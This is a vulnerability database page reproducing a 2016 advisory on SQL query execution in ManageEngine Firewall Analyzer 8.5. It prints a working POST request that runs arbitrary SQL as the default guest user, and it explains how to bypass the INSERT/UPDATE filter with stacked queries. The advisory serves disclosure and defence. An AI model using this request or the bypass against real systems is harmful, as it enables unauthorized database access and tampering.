Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ManageEngine Firewall Analyzer 8.5 SQL Injection

🗓️ 22 Feb 2016 00:00:00Reported by Sachin WaghType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

ManageEngine Firewall Analyzer 8.5 SQL Injection vulnerability description and fi

Code
`================================================================  
ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability  
================================================================  
  
Description :  
  
Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution  
Vulnerability  
Vulnerable Version : 8.5  
Vendor Homepage:https://www.manageengine.com/products/firewall/download.html  
CVE-ID :  
Severity : High  
Author – Sachin Wagh (@tiger_tigerboy)  
  
ManageEngine Firewall Analyzer is an agent less log analytics and  
configuration management software that helps network administrators to  
centrally collect,  
archive, analyze their security device logs and generate forensic reports  
out of it.  
  
The vulnerability exists due to an error in the RunQuerycommand. An  
authenticated, remote attacker could exploit  
this vulnerability via a crafted POST request. An exploit could allow the  
attacker to execute arbitrary SQL queries on the underlying database  
server.  
  
Every user has the ability to execute SQL queries through the  
"/fw/runQuery.do" script, including the default "guest" user.  
  
Below is the POST request, executed as "guest":  
  
POST /fw/runQuery.do HTTP/1.1  
Host: localhost:8500  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101  
Firefox/40.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost:8500/fw/runQuery.do  
Cookie: username=guest; password=8094789293; leftPanel=230px;  
JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F;  
JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
execute=true&DatabaseType=postgres&query=select version()  
  
Access to queries starting with "INSERT" or "UPDATE" giving warning as  
"operation not permitted"  
  
But When executed query, like this:"SELECT 1;INSERT INTO ..." its not  
giving any warning.  
  
Affected Product:  
-----------------------------------------------------------------------------------------------------------------------  
  
Vulnerable Product:  
[+] ManageEngine Firewall Analyzer 8.5  
  
Credits & Authors  
------------------------------------------------------------------------------------------------------------------------  
Sachin Wagh (@tiger_tigerboy)  
  
Thanks.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Feb 2016 00:00Current
0.9Low risk
Vulners AI Score0.9
manageengine firewall analyzersql injectionvulnerabilitysql query executionremote attackerpost requestdatabase server
32